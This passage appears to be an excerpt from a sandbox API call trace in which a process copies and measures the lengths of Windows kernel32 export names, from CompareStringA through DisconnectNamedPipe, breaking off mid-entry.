lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.482] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.482] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.482] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.482] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.482] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.482] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.482] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.482] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.482] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.483] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.483] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.483] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.483] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.483] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.483] lstrlenA (lpString="COPYFILEA") returned 9 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.483] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.483] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.483] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.483] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.483] lstrlenA (lpString="COPYFILEW") returned 9 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.483] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.483] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.483] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.483] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.483] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.483] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.483] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.483] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.483] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.484] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.484] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.484] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.484] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.484] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.484] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.484] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.484] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.484] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.484] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.484] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.484] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.484] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.484] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.484] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.484] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.484] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.484] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.484] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.484] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.485] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.485] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.485] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.485] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.485] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.485] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.485] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.485] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.485] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.485] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.485] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.485] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.485] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.485] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.485] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.485] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.485] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.485] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.485] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.486] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.486] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.486] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.486] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.486] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.486] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.486] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.486] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.486] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.486] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.486] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.486] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.486] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.486] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.486] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.487] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.487] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.487] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.487] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.487] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.487] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.487] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.487] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.487] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.487] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.487] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.487] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.487] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.487] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.487] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.487] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.487] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.487] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.487] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.488] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.488] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.488] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.488] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.488] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.488] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.488] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.488] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.488] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.488] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.488] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.488] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.488] lstrlenA (lpString="DELETEATOM") returned 10 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.488] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.488] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.488] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.488] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.488] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.488] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.488] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.489] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.489] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.489] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.489] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.489] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.489] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.489] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.489] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.489] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.489] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.489] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.489] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.489] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: 